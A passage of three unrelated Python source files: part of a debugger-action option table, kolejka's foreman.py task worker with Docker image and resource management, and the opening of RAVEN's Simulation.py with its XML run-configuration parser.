'names': ['--require-openocd', '--require_openocd'],
'help':
('Fail this target if openocd (this targets dependency) failed.\n'),
'is_flag': True,
'default': False,
}
gdbinit = {
'names': ['--gdbinit'],
'help': ('Specify the name of gdbinit file to use\n'),
'default': None,
}
debug_actions = {
'global_action_callbacks': [global_callback],
'actions': {
'openocd': {
'callback': openocd,
'help': 'Run openocd from current path',
'options': [
{
'names': ['--openocd-scripts', '--openocd_scripts'],
'help':
('Script directory for openocd cfg files.\n'),
'default':
None,
},
{
'names': ['--openocd-commands', '--openocd_commands'],
'help':
('Command line arguments for openocd.\n'),
'default': None,
}
],
'order_dependencies': ['all', 'flash'],
},
'gdb': {
'callback': gdb,
'help': 'Run the GDB.',
'options': [
{
'names': ['--gdb-tui', '--gdb_tui'],
'help':
('run gdb in TUI mode\n'),
'default':
None,
}, gdbinit, fail_if_openocd_failed
],
'order_dependencies': ['all', 'flash'],
},
'gdbgui': {
'callback': gdbui,
'help': 'GDB UI in default browser.',
'options': [
{
'names': ['--gdbgui-port', '--gdbgui_port'],
'help':
('The port on which gdbgui will be hosted. Default: 5000\n'),
'default':
None,
}, gdbinit, fail_if_openocd_failed
],
'order_dependencies': ['all', 'flash'],
},
'gdbtui': {
'callback': gdbtui,
'help': 'GDB TUI mode.',
'options': [gdbinit, fail_if_openocd_failed],
'order_dependencies': ['all', 'flash'],
},
'post_debug': {
'callback': post_debug,
'help': 'Utility target to read the output of async debug action and stop them.',
'options': [
{
'names': ['--block', '--block'],
'help':
('Set to 1 for blocking the console on the outputs of async debug actions\n'),
'default': 0,
},
],
'order_dependencies': [],
},
},
}
return debug_actions
|
foreman.py
|
# vim:ts=4:sts=4:sw=4:expandtab
import copy
import datetime
import dateutil.parser
import glob
import json
import logging
import math
from multiprocessing import Process
import os
import random
import shutil
import subprocess
import sys
import tempfile
import traceback
from threading import Thread
import time
import uuid
from kolejka.common import kolejka_config, foreman_config
from kolejka.common import KolejkaTask, KolejkaResult, KolejkaLimits
from kolejka.common import MemoryAction, TimeAction, parse_memory
from kolejka.client import KolejkaClient
from kolejka.worker.stage0 import stage0
from kolejka.worker.volume import check_python_volume
def manage_images(pull, size, necessary_images, priority_images):
necessary_size = sum(necessary_images.values(), 0)
free_size = size - necessary_size
assert free_size >= 0
docker_images = dict([(a.split()[0], parse_memory(a.split()[1])) for a in str(subprocess.run(['docker', 'image', 'ls', '--format', '{{.Repository}}:{{.Tag}} {{.Size}}'], stdout=subprocess.PIPE, check=True).stdout, 'utf-8').split('\n') if a])
p_images = dict()
for image in priority_images:
if image in docker_images:
p_images[image] = docker_images[image]
priority_images = p_images
keep_images = set()
for image in necessary_images:
keep_images.add(image)
list_images = list(priority_images.items())
random.shuffle(list_images)
li = list(docker_images.items())
random.shuffle(li)
list_images += li
for image,size in list_images:
if image in keep_images:
continue
if size <= free_size:
free_size -= size
keep_images.add(image)
for image in docker_images:
if image not in keep_images:
subprocess.run(['docker', 'image', 'rm', image])
for image,size in necessary_images.items():
pull_image = pull
if not pull_image:
docker_inspect_run = subprocess.run(['docker', 'image', 'inspect', image], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
if docker_inspect_run.returncode != 0:
pull_image = True
if pull_image:
subprocess.run(['docker', 'pull', image], check=True)
docker_inspect_run = subprocess.run(['docker', 'image', 'inspect', '--format', '{{json .Size}}', image], stdout=subprocess.PIPE, check=True)
image_size = int(json.loads(str(docker_inspect_run.stdout, 'utf-8')))
assert image_size <= size
def foreman_single(temp_path, task):
config = foreman_config()
with tempfile.TemporaryDirectory(temp_path) as jailed_path:
if task.limits.workspace is not None:
subprocess.run(['mount', '-t', 'tmpfs', '-o', 'size='+str(task.limits.workspace), 'none', jailed_path], check=True)
try:
task_path = os.path.join(jailed_path, 'task')
result_path = os.path.join(jailed_path, 'result')
temp_path = os.path.join(jailed_path, 'temp')
os.makedirs(task_path, exist_ok=True)
os.makedirs(result_path, exist_ok=True)
os.makedirs(temp_path, exist_ok=True)
task.path = task_path
client = KolejkaClient()
client.task_get(task.id, task_path)
for k,f in task.files.items():
f.path = k
task.commit()
stage0(task.path, result_path, temp_path=temp_path, consume_task_folder=True)
result = KolejkaResult(result_path)
result.tags = config.tags
client.result_put(result)
except:
traceback.print_exc()
finally:
if task.limits.storage is not None:
subprocess.run(['umount', '-l', jailed_path])
def foreman():
config = foreman_config()
limits = KolejkaLimits()
limits.cpus = config.cpus
limits.memory = config.memory
limits.swap = config.swap
limits.pids = config.pids
limits.storage = config.storage
limits.image = config.image
limits.workspace = config.workspace
limits.time = config.time
limits.network = config.network
client = KolejkaClient()
while True:
try:
tasks = client.dequeue(config.concurency, limits, config.tags)
if len(tasks) == 0:
time.sleep(config.interval)
else:
check_python_volume()
while len(tasks) > 0:
resources = KolejkaLimits()
resources.update(limits)
image_usage = dict()
processes = list()
cpus_offset = 0
for task in tasks:
if len(processes) >= config.concurency:
break
if task.exclusive and len(processes) > 0:
break
task.limits.update(limits)
task.limits.cpus_offset = cpus_offset
ok = True
if resources.cpus is not None and task.limits.cpus > resources.cpus:
ok = False
if resources.memory is not None and task.limits.memory > resources.memory:
ok = False
if resources.swap is not None and task.limits.swap > resources.swap:
ok = False
if resources.pids is not None and task.limits.pids > resources.pids:
ok = False
if resources.storage is not None and task.limits.storage > resources.storage:
ok = False
if resources.image is not None:
image_usage_add = max(image_usage.get(task.image, 0), task.limits.image) - image_usage.get(task.image, 0)
if image_usage_add > resources.image:
ok = False
if resources.workspace is not None and task.limits.workspace > resources.workspace:
ok = False
if ok:
proc = Process(target=foreman_single, args=(config.temp_path, task))
processes.append(proc)
cpus_offset += task.limits.cpus
if resources.cpus is not None:
resources.cpus -= task.limits.cpus
if resources.memory is not None:
resources.memory -= task.limits.memory
if resources.swap is not None:
resources.swap -= task.limits.swap
if resources.pids is not None:
resources.pids -= task.limits.pids
if resources.storage is not None:
resources.storage -= task.limits.storage
if resources.image is not None:
resources.image -= image_usage_add
image_usage[task.image] = max(image_usage.get(task.image, 0), task.limits.image)
if resources.workspace is not None:
resources.workspace -= task.limits.workspace
tasks = tasks[1:]
if task.exclusive:
break
else:
break
if config.image is not None:
manage_images(config.pull, config.image, image_usage, [task.image for task in tasks])
for proc in processes:
proc.start()
for proc in processes:
proc.join()
except KeyboardInterrupt:
raise
except:
traceback.print_exc()
time.sleep(config.interval)
def config_parser(parser):
parser.add_argument('--auto-tags', type=bool, help='add automatically generated machine tags', default=True)
parser.add_argument('--pull', action='store_true', help='always pull images, even if local version is present', default=False)
parser.add_argument('--tags', type=str, help='comma separated list of machine tags')
parser.add_argument('--temp', type=str, help='temp folder')
parser.add_argument('--interval', type=float, help='dequeue interval (in seconds)')
parser.add_argument('--concurency', type=int, help='number of simultaneous tasks')
parser.add_argument('--cpus', type=int, help='cpus limit')
parser.add_argument('--memory', action=MemoryAction, help='memory limit')
parser.add_argument('--swap', action=MemoryAction, help='swap limit')
parser.add_argument('--pids', type=int, help='pids limit')
parser.add_argument('--storage', action=MemoryAction, help='storage limit')
parser.add_argument('--image', action=MemoryAction, help='image size limit')
parser.add_argument('--workspace', action=MemoryAction, help='workspace size limit')
parser.add_argument('--time', action=TimeAction, help='time limit')
parser.add_argument('--network',type=bool, help='allow netowrking')
def execute(args):
kolejka_config(args=args)
foreman()
parser.set_defaults(execute=execute)
|
Simulation.py
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module that contains the driver for the whole the simulation flow (Simulation Class)
"""
import xml.etree.ElementTree as ET
import os,subprocess
import sys
import io
import string
import datetime
import numpy as np
import threading
import MessageHandler # this needs to happen early to instantiate message handler
from BaseClasses import MessageUser
import PluginFactory
import Steps
import DataObjects
import Files
import Samplers
import Optimizers
import Models
import Metrics
import Distributions
import Databases
import Functions
import OutStreams
from JobHandler import JobHandler
from utils import utils, TreeStructure, xmlUtils, mathUtils
import Decorators
from Application import __QtAvailable
from Interaction import Interaction
if __QtAvailable:
from Application import InteractiveApplication
# Load up plugins!
# -> only available on specially-marked base types
Models.Model.loadFromPlugins()
#----------------------------------------------------------------------------------------------------
class SimulationMode(MessageUser):
"""
SimulationMode allows changes to the how the simulation
runs are done. modifySimulation lets the mode change runInfoDict
and other parameters. remoteRunCommand lets a command to run RAVEN
remotely be specified.
"""
def __init__(self, *args):
"""
Constructor
@ In, args, list, unused positional arguments
@ Out, None
"""
super().__init__()
self.printTag = 'SIMULATION MODE'
def remoteRunCommand(self, runInfoDict):
"""
If this returns None, do nothing. If it returns a dictionary,
use the dictionary to run raven remotely.
@ In, runInfoDict, dict, the run info
@ Out, remoteRunCommand, dict, the information for the remote command.
The dictionary should have a "args" key that is used as a command to
a subprocess.call. It optionally can have a "cwd" for the current
working directory and a "env" for the environment to use for the command.
"""
return None
def modifyInfo(self, runInfoDict):
"""
modifySimulation is called after the runInfoDict has been setup.
This allows the mode to change any parameters that need changing.
This typically modifies the precommand and the postcommand that
are put infront of the command and after the command.
@ In, runInfoDict, dict, the run info
@ Out, dictionary to use for modifications. If empty, no changes
"""
import multiprocessing
try:
if multiprocessing.cpu_count() < runInfoDict['batchSize']:
self.raiseAWarning("cpu_count",multiprocessing.cpu_count(),"< batchSize",runInfoDict['batchSize'])
except NotImplementedError:
pass
return {}
def XMLread(self,xmlNode):
"""
XMLread is called with the mode node, and can be used to
get extra parameters needed for the simulation mode.
@ In, xmlNode, xml.etree.ElementTree.Element, the xml node that belongs to this class instance
@ Out, None
"""
pass
#Note that this has to be after SimulationMode is defined or the CustomModes
#don't see SimulationMode when they import Simulation
import CustomModes
def splitCommand(s):
"""
Splits the string s into a list that can be used for the command
So for example splitCommand("ab bc c 'el f' \"bar foo\" ") ->
['ab', 'bc', 'c', 'el f', 'bar foo']
Bugs: Does not handle quoted strings with different kinds of quotes
@ In, s, string, the command to split
@ Out, retList, list, the list of splitted command
"""
n = 0
retList = []
inQuote = False
buffer = ""
while n < len(s):
current = s[n]
if current in string.whitespace and not inQuote:
if len(buffer) > 0:
#found end of command
retList.append(buffer)
buffer = ""
elif current in "\"'":
if inQuote:
inQuote = False
else:
inQuote = True
else:
buffer = buffer + current
n += 1
if len(buffer) > 0:
retList.append(buffer)
return retList
#----------------------------------------------------------------------
#
#
#
#-----------------------------------------------------------------------------------------------------
class Simulation(MessageUser):
"""
This is a class that contain all the object needed to run the simulation
Usage:
myInstance = Simulation() !Generate the instance
myInstance.XMLread(xml.etree.ElementTree.Element) !This method generate all the objects living in the simulation
myInstance.initialize() !This method takes care of setting up the directory/file environment with proper checks
myInstance.run() !This method run the simulation
Utility methods:
myInstance.printDicts !prints the dictionaries representing the whole simulation
myInstance.setInputFiles !re-associate the set of files owned by the simulation
myInstance.getDefaultInputFile !return the default name of the input file read by the simulation
Inherited from the BaseType class:
myInstance.whoAreYou() !inherited from BaseType class-
myInstance.myClassmyCurrentSetting() !see BaseType class-
--how to add a new entity <myClass> to the simulation--
Add an import for the module where it is defined. Convention is that the module is named with the plural
of the base class of the module: <MyModule>=<myClass>+'s'.
The base class of the module is by convention named as the new type of simulation component <myClass>.
The module should contain a set of classes named <myType> that are child of the base class <myClass>.
The module should possess a function <MyModule>.factory.returnInstance('<myType>') that returns a pointer to the class <myType>.
Add in Simulation.__init__ the following
self.<myClass>Dict = {}
self.entityModules['<myClass>'] = <MyModule>
self.entities['<myClass>' ] = self.<myClass>+'Dict'
The XML describing the new entity should be organized as it follows:
<MyModule (camelback with first letter capital)>
<MyType (camelback with first letter capital) name='here a user given name' subType='here additional specialization'>
<if needed more xml nodes>
</MyType>
</MyModule>
--Comments on the simulation environment--
every type of element living in the simulation should be uniquely identified by type and name not by sub-type
!!!!Wrong!!!!!!!!!!!!!!!!:
Class: distribution, type: normal, name: myDistribution
Class: distribution, type: triangular, name: myDistribution
Correct:
type: distribution, type: normal, name: myNormalDist
type: distribution, type: triangular, name: myTriDist
Using the attribute in the xml node <MyType> type discouraged to avoid confusion
"""
def __init__(self, frameworkDir, verbosity='all', interactive=Interaction.No):
"""
Constructor
@ In, frameworkDir, string, absolute path to framework directory
@ In, verbosity, string, optional, general verbosity level
@ In, interactive, Interaction, optional, toggles the ability to provide
an interactive UI or to run to completion without human interaction
@ Out, None
"""
super().__init__()
self.FIXME = False
#set the numpy print threshold to avoid ellipses in array truncation
np.set_printoptions(threshold=np.inf)
self.verbosity = verbosity
callerLength = 25
tagLength = 15
suppressErrs = False
self.messageHandler.initialize({'verbosity':self.verbosity,
'callerLength':callerLength,
'tagLength':tagLength,
'suppressErrs':suppressErrs})
readtime = datetime.datetime.fromtimestamp(self.messageHandler.starttime).strftime('%Y-%m-%d %H:%M:%S')
sys.path.append(os.getcwd())
#this dictionary contains the general info to run the simulation
self.runInfoDict = {}
self.runInfoDict['DefaultInputFile' ] = 'test.xml' #Default input file to use
self.runInfoDict['SimulationFiles' ] = [] #the xml input file
self.runInfoDict['ScriptDir' ] = os.path.join(os.path.dirname(frameworkDir),"scripts") # the location of the pbs script interfaces
self.runInfoDict['FrameworkDir' ] = frameworkDir # the directory where the framework is located
self.runInfoDict['RemoteRunCommand' ] = os.path.join(frameworkDir,'raven_qsub_command.sh')
self.runInfoDict['NodeParameter' ] = '-f' # the parameter used to specify the files where the nodes are listed
self.runInfoDict['MPIExec' ] = 'mpiexec' # the command used to run mpi commands
self.runInfoDict['WorkingDir' ] = '' # the directory where the framework should be running
self.runInfoDict['TempWorkingDir' ] = '' # the temporary directory where a simulation step is run
self.runInfoDict['NumMPI' ] = 1 # the number of mpi process by run
self.runInfoDict['NumThreads' ] = 1 # Number of Threads by run
self.runInfoDict['numProcByRun' ] = 1 # Total number of core used by one run (number of threads by number of mpi)
self.runInfoDict['batchSize' ] = 1 # number of contemporaneous runs
self.runInfoDict['internalParallel' ] = False # activate internal parallel (parallel python). If True parallel python is used, otherwise multi-threading is used
self.runInfoDict['ParallelCommand' ] = '' # the command that should be used to submit jobs in parallel (mpi)
self.runInfoDict['ThreadingCommand' ] = '' # the command should be used to submit multi-threaded
self.runInfoDict['totalNumCoresUsed' ] = 1 # total number of cores used by driver
self.runInfoDict['queueingSoftware' ] = '' # queueing software name
self.runInfoDict['stepName' ] = '' # the name of the step currently running
self.runInfoDict['precommand' ] = '' # Add to the front of the command that is run
self.runInfoDict['postcommand' ] = '' # Added after the command that is run.
self.runInfoDict['delSucLogFiles' ] = False # If a simulation (code run) has not failed, delete the relative log file (if True)
self.runInfoDict['deleteOutExtension'] = [] # If a simulation (code run) has not failed, delete the relative output files with the listed extension (comma separated list, for example: 'e,r,txt')
self.runInfoDict['mode' ] = '' # Running mode. Curently the only mode supported is mpi but others can be added with custom modes.
self.runInfoDict['Nodes' ] = [] # List of node IDs. Filled only in case RAVEN is run in a DMP machine
self.runInfoDict['expectedTime' ] = '10:00:00' # How long the complete input is expected to run.
self.runInfoDict['logfileBuffer' ] = int(io.DEFAULT_BUFFER_SIZE)*50 # logfile buffer size in bytes
self.runInfoDict['clusterParameters' ] = [] # Extra parameters to use with the qsub command.
self.runInfoDict['maxQueueSize' ] = None
#Following a set of dictionaries that, in a manner consistent with their names, collect the instance of all objects needed in the simulation
#Theirs keywords in the dictionaries are the the user given names of data, sampler, etc.
#The value corresponding to a keyword is the instance of the corresponding class
self.stepsDict = {}
self.dataDict = {}
self.samplersDict = {}
self.modelsDict = {}
self.distributionsDict = {}
self.dataBasesDict = {}
self.functionsDict = {}
self.filesDict = {} # for each file returns an instance of a Files class
self.metricsDict = {}
self.outStreamsDict = {}
self.stepSequenceList = [] #the list of step of the simulation
#list of supported queue-ing software:
self.knownQueueingSoftware = []
self.knownQueueingSoftware.append('None')
self.knownQueueingSoftware.append('PBS Professional')
#Dictionary of mode handlers for the
self.__modeHandlerDict = CustomModes.modeHandlers
#self.__modeHandlerDict['mpi'] = CustomModes.MPISimulationMode
#self.__modeHandlerDict['mpilegacy'] = CustomModes.MPILegacySimulationMode
#this dictionary contain the static factory that return the instance of one of the allowed entities in the simulation
#the keywords are the name of the module that contains the specialization of that specific entity
self.entityModules = {}
self.entityModules['Steps' ] = Steps
self.entityModules['DataObjects' ] = DataObjects
self.entityModules['Samplers' ] = Samplers
self.entityModules['Optimizers' ] = Optimizers
self.entityModules['Models' ] = Models
self.entityModules['Distributions' ] = Distributions
self.entityModules['Databases' ] = Databases
self.entityModules['Functions' ] = Functions
self.entityModules['Files' ] = Files
self.entityModules['Metrics' ] = Metrics
self.entityModules['OutStreams' ] = OutStreams
# register plugins
# -> only don't actually load them, because we want to lazy load if at all possible
# -> instead, we just provide the pointer to the plugins dicts
for name, module in self.entityModules.items():
if hasattr(module, 'setPluginFactory'):
module.setPluginFactory(PluginFactory)
#Mapping between an entity type and the dictionary containing the instances for the simulation
self.entities = {}
self.entities['Steps' ] = self.stepsDict
self.entities['DataObjects' ] = self.dataDict
self.entities['Samplers' ] = self.samplersDict
self.entities['Optimizers' ] = self.samplersDict
self.entities['Models' ] = self.modelsDict
self.entities['RunInfo' ] = self.runInfoDict
self.entities['Files' ] = self.filesDict
self.entities['Distributions' ] = self.distributionsDict
self.entities['Databases' ] = self.dataBasesDict
self.entities['Functions' ] = self.functionsDict
self.entities['Metrics' ] = self.metricsDict
self.entities['OutStreams' ] = self.outStreamsDict
# The QApplication
## The benefit of this enumerated type is that anything other than
## Interaction.No will evaluate to true here and correctly make the
## interactive app.
if interactive:
self.app = InteractiveApplication([], interactive)
else:
self.app = None
#the handler of the runs within each step
self.jobHandler = JobHandler()
#handle the setting of how the jobHandler act
self.__modeHandler = SimulationMode(self)
self.printTag = 'SIMULATION'
self.raiseAMessage('Simulation started at',readtime,verbosity='silent')
self.pollingThread = threading.Thread(target=self.jobHandler.startLoop)
## This allows RAVEN to exit when the only thing left is the JobHandler
## This should no longer be necessary since the jobHandler now has an off
## switch that this object can flip when it is complete, however, if
## simulation fails before it is finished, we should probably still ensure
## that this thread is killed as well, so maybe it is best to keep it for
## now.
self.pollingThread.daemon = True
self.pollingThread.start()
@Decorators.timingProfile
def setInputFiles(self,inputFiles):
"""
Method that can be used to set the input files that the program received.
These are currently used for cluster running where the program
needs to be restarted on a different node.
@ In, inputFiles, list, input files list
@ Out, None
"""
self.runInfoDict['SimulationFiles' ] = inputFiles
def getDefaultInputFile(self):
"""
Returns the default input file to read
@ In, None
@ Out, defaultInputFile, string, default input file
"""
defaultInputFile = self.runInfoDict['DefaultInputFile']
return defaultInputFile
def __createAbsPath(self,fileIn):
"""
Assuming that the file in is already in the self.filesDict it places, as value, the absolute path
@ In, fileIn, string, the file name that needs to be made "absolute"
@ Out, None
"""
curfile = self.filesDict[fileIn]
path = os.path.normpath(self.runInfoDict['WorkingDir'])
curfile.prependPath(path) #this respects existing path from the user input, if any
def XMLpreprocess(self,node,cwd):
"""
Preprocess the input file, load external xml files into the main ET
@ In, node, TreeStructure.InputNode, element of RAVEN input file
@ In, cwd, string, current working directory (for relative path searches)
@ Out, None
"""
xmlUtils.expandExternalXML(node,cwd)
def XMLread(self,xmlNode,runInfoSkip = set(),xmlFilename=None):
"""
parses the xml input file, instances the classes need to represent all objects in the simulation
@ In, xmlNode, ElementTree.Element, xml node to read in
@ In, runInfoSkip, set, optional, nodes to skip
@ In, xmlFilename, string, optional, xml filename for relative directory
@ Out, None
"""
#TODO update syntax to note that we read InputTrees not XmlTrees
unknownAttribs = utils.checkIfUnknowElementsinList(['printTimeStamps','verbosity','color','profile'],list(xmlNode.attrib.keys()))
if len(unknownAttribs) > 0:
errorMsg = 'The following attributes are unknown:'
for element in unknownAttribs:
errorMsg += ' ' + element
self.raiseAnError(IOError,errorMsg)
self.verbosity = xmlNode.attrib.get('verbosity','all').lower()
if 'printTimeStamps' in xmlNode.attrib.keys():
self.raiseADebug('Setting "printTimeStamps" to',xmlNode.attrib['printTimeStamps'])
self.messageHandler.setTimePrint(xmlNode.attrib['printTimeStamps'])
if 'color' in xmlNode.attrib.keys():
self.raiseADebug('Setting color output mode to',xmlNode.attrib['color'])
self.messageHandler.setColor(xmlNode.attrib['color'])
if 'profile' in xmlNode.attrib.keys():
thingsToProfile = list(p.strip().lower() for p in xmlNode.attrib['profile'].split(','))
if 'jobs' in thingsToProfile:
self.jobHandler.setProfileJobs(True)
self.messageHandler.verbosity = self.verbosity
runInfoNode = xmlNode.find('RunInfo')
if runInfoNode is None:
self.raiseAnError(IOError,'The RunInfo node is missing!')
self.__readRunInfo(runInfoNode,runInfoSkip,xmlFilename)
### expand variable groups before continuing ###
## build variable groups ##
varGroupNode = xmlNode.find('VariableGroups')
# init, read XML for variable groups
if varGroupNode is not None:
varGroups = mathUtils.readVariableGroups(varGroupNode)
else:
varGroups={}
# read other nodes
for child in xmlNode:
if child.tag == 'VariableGroups':
continue #we did these before the for loop
xmlUtils.replaceVariableGroups(child, varGroups)
if child.tag in self.entities:
className = child.tag
# we already took care of RunInfo block
if className in ['RunInfo']:
continue
self.raiseADebug('-'*2+' Reading the block: {0:15}'.format(str(child.tag))+2*'-')
if len(child.attrib) == 0:
globalAttributes = {}
else:
globalAttributes = child.attrib
if self.entityModules[className].factory.returnInputParameter:
paramInput = self.entityModules[className].returnInputParameter()
paramInput.parseNode(child)
for childChild in paramInput.subparts:
childName = childChild.getName()
entity = self.entityModules[className].factory.returnInstance(childName)
entity.applyRunInfo(self.runInfoDict)
entity.handleInput(childChild, globalAttributes=globalAttributes)
name = entity.name
self.entities[className][name] = entity
else:
for childChild in child:
subType = childChild.tag
if 'name' in childChild.attrib.keys():
name = childChild.attrib['name']
self.raiseADebug('Reading type '+str(childChild.tag)+' with name '+name)
#place the instance in the proper dictionary (self.entities[Type]) under his name as key,
#the type is the general class (sampler, data, etc) while childChild.tag is the sub type
if name not in self.entities[className]:
entity = self.entityModules[className].factory.returnInstance(childChild.tag)
else:
self.raiseAnError(IOError,'Redundant naming in the input for class '+className+' and name '+name)
entity.applyRunInfo(self.runInfoDict)
entity.readXML(childChild, varGroups, globalAttributes=globalAttributes)
self.entities[className][name] = entity
else:
self.raiseAnError(IOError,'not found name attribute for one "{}": {}'.format(className,subType))
else:
#tag not in entities, check if it's a documentation tag
if child.tag not in ['TestInfo']:
self.raiseAnError(IOError,'<'+child.tag+'> is not among the known simulation components '+repr(child))
# If requested, duplicate input
# ###NOTE: All substitutions to the XML input tree should be done BEFORE this point!!
if self.runInfoDict.get('printInput',False):
fileName = os.path.join(self.runInfoDict['WorkingDir'],self.runInfoDict['printInput'])
self.raiseAMessage('Writing duplicate input file:',fileName)
outFile = open(fileName,'w')
outFile.writelines(utils.toString(TreeStructure.tostring(xmlNode))+'\n') #\n for no-end-of-line issue
outFile.close()
if not set(self.stepSequenceList).issubset(set(self.stepsDict.keys())):
self.raiseAnError(IOError,'The step list: '+str(self.stepSequenceList)+' contains steps that have not been declared: '+str(list(self.stepsDict.keys())))
def initialize(self):
"""
Method to initialize the simulation.
Check/created working directory, check/set up the parallel environment, call step consistency checker
@ In, None
@ Out, None
"""
#move the full simulation environment in the working directory
self.raiseADebug('Moving to working directory:',self.runInfoDict['WorkingDir'])
os.chdir(self.runInfoDict['WorkingDir'])
#add also the new working dir to the path
sys.path.append(os.getcwd())
# clear the raven status file, if any
self.clearStatusFile()
#check consistency and fill the missing info for the // runs (threading, mpi, batches)
self.runInfoDict['numProcByRun'] = self.runInfoDict['NumMPI']*self.runInfoDict['NumThreads']
oldTotalNumCoresUsed = self.runInfoDict['totalNumCoresUsed']
self.runInfoDict['totalNumCoresUsed'] = self.runInfoDict['numProcByRun']*self.runInfoDict['batchSize']
if self.runInfoDict['totalNumCoresUsed'] < oldTotalNumCoresUsed:
#This is used to reserve some cores
self.runInfoDict['totalNumCoresUsed'] = oldTotalNumCoresUsed
elif oldTotalNumCoresUsed > 1:
#If 1, probably just default
self.raiseAWarning("overriding totalNumCoresUsed",oldTotalNumCoresUsed,"to", self.runInfoDict['totalNumCoresUsed'])
#transform all files in absolute path
for key in self.filesDict.keys():
self.__createAbsPath(key)
#Let the mode handler do any modification here
newRunInfo = self.__modeHandler.modifyInfo(dict(self.runInfoDict))
for key in newRunInfo:
#Copy in all the new keys
self.runInfoDict[key] = newRunInfo[key]
self.jobHandler.applyRunInfo(self.runInfoDict)
self.jobHandler.initialize()
# only print the dictionaries when the verbosity is set to debug
#if self.verbosity == 'debug': self.printDicts()
for stepName, stepInstance in self.stepsDict.items():
self.checkStep(stepInstance,stepName)
def checkStep(self,stepInstance,stepName):
"""
This method checks the coherence of the simulation step by step
@ In, stepInstance, instance, instance of the step
@ In, stepName, string, the name of the step to check
@ Out, None
"""
for [role, myClass, objectType, name] in stepInstance.parList:
if myClass != 'Step' and myClass not in list(self.entities.keys()):
self.raiseAnError(IOError, f'For step named "{stepName}" the role "{role}" has been ' +
f'assigned to an unknown class type "{myClass}"!')
if name not in self.entities[myClass]:
self.raiseADebug('name:',name)
self.raiseADebug('myClass:',myClass)
self.raiseADebug('list:',list(self.entities[myClass].keys()))
self.raiseADebug('entities[myClass]',self.entities[myClass])
self.raiseAnError(IOError, f'In step "{stepName}" the class "{myClass}" named "{name}" ' +
f'supposed to be used for the role "{role}" has not been found!')
if myClass != 'Files':
# check if object type is consistent
objtype = self.entities[myClass][name].type
def __readRunInfo(self,xmlNode,runInfoSkip,xmlFilename):
"""
Method that reads the xml input file for the RunInfo block
@ In, xmlNode, xml.etree.Element, the xml node that belongs to Simulation
@ In, runInfoSkip, string, the runInfo step to skip
@ In, xmlFilename, string, xml input file name
@ Out, None
"""
if 'verbosity' in xmlNode.attrib.keys():
self.verbosity = xmlNode.attrib['verbosity']
self.raiseAMessage('Global verbosity level is "',self.verbosity,'"',verbosity='quiet')
for element in xmlNode:
if element.tag in runInfoSkip:
self.raiseAWarning("Skipped element ",element.tag)
elif element.tag == 'printInput':
text = element.text.strip() if element.text is not None else ''
#extension fixing
if len(text) >= 4 and text[-4:].lower() == '.xml':
text = text[:-4]
# if the user asked to not print input instead of leaving off tag, respect it
if utils.stringIsFalse(text):
self.runInfoDict['printInput'] = False
# if the user didn't provide a name, provide a default
elif len(text)<1:
self.runInfoDict['printInput'] = 'duplicated_input.xml'
# otherwise, use the user-provided name
else:
self.runInfoDict['printInput'] = text+'.xml'
elif element.tag == 'WorkingDir':
# first store the cwd, the "CallDir"
self.runInfoDict['CallDir'] = os.getcwd()
# then get the requested "WorkingDir"
tempName = element.text
if element.text is None:
self.raiseAnError(IOError, 'RunInfo.WorkingDir is empty! Use "." to signify "work here" or specify a directory.')
if '~' in tempName:
tempName = os.path.expanduser(tempName)
if os.path.isabs(tempName):
self.runInfoDict['WorkingDir'] = tempName
elif "runRelative" in element.attrib:
self.runInfoDict['WorkingDir'] = os.path.abspath(tempName)
else:
if xmlFilename == None:
self.raiseAnError(IOError,'Relative working directory requested but xmlFilename is None.')
# store location of the input
xmlDirectory = os.path.dirname(os.path.abspath(xmlFilename))
self.runInfoDict['InputDir'] = xmlDirectory
rawRelativeWorkingDir = element.text.strip()
# working dir is file location + relative working dir
self.runInfoDict['WorkingDir'] = os.path.join(xmlDirectory,rawRelativeWorkingDir)
utils.makeDir(self.runInfoDict['WorkingDir'])
elif element.tag == 'maxQueueSize':
try:
self.runInfoDict['maxQueueSize'] = int(element.text)
except ValueError:
self.raiseAnError('Value give for RunInfo.maxQueueSize could not be converted to integer: {}'.format(element.text))
elif element.tag == 'RemoteRunCommand':
tempName = element.text
if '~' in tempName:
tempName = os.path.expanduser(tempName)
if os.path.isabs(tempName):
self.runInfoDict['RemoteRunCommand'] = tempName
else:
self.runInfoDict['RemoteRunCommand'] = os.path.abspath(os.path.join(self.runInfoDict['FrameworkDir'],tempName))
elif element.tag == 'NodeParameter':
self.runInfoDict['NodeParameter'] = element.text.strip()
elif element.tag == 'MPIExec':
self.runInfoDict['MPIExec'] = element.text.strip()
elif element.tag == 'JobName':
self.runInfoDict['JobName' ] = element.text.strip()
elif element.tag == 'ParallelCommand':
self.runInfoDict['ParallelCommand' ] = element.text.strip()
elif element.tag == 'queueingSoftware':
self.runInfoDict['queueingSoftware' ] = element.text.strip()
elif element.tag == 'ThreadingCommand':
self.runInfoDict['ThreadingCommand' ] = element.text.strip()
elif element.tag == 'NumThreads':
self.runInfoDict['NumThreads' ] = int(element.text)
elif element.tag == 'totalNumCoresUsed':
self.runInfoDict['totalNumCoresUsed' ] = int(element.text)
elif element.tag == 'NumMPI':
self.runInfoDict['NumMPI' ] = int(element.text)
elif element.tag == 'internalParallel':
self.runInfoDict['internalParallel' ] = utils.interpretBoolean(element.text)
elif element.tag == 'batchSize':
self.runInfoDict['batchSize' ] = int(element.text)
elif element.tag.lower() == 'maxqueuesize':
self.runInfoDict['maxQueueSize' ] = int(element.text)
elif element.tag == 'MaxLogFileSize':
self.runInfoDict['MaxLogFileSize' ] = int(element.text)
elif element.tag == 'precommand':
self.runInfoDict['precommand' ] = element.text
elif element.tag == 'postcommand':
self.runInfoDict['postcommand' ] = element.text
elif element.tag == 'deleteOutExtension':
self.runInfoDict['deleteOutExtension'] = element.text.strip().split(',')
elif element.tag == 'delSucLogFiles' :
if utils.stringIsTrue(element.text):
self.runInfoDict['delSucLogFiles' ] = True
else:
self.runInfoDict['delSucLogFiles' ] = False
elif element.tag == 'logfileBuffer':
self.runInfoDict['logfileBuffer'] = utils.convertMultipleToBytes(element.text.lower())
elif element.tag == 'clusterParameters':
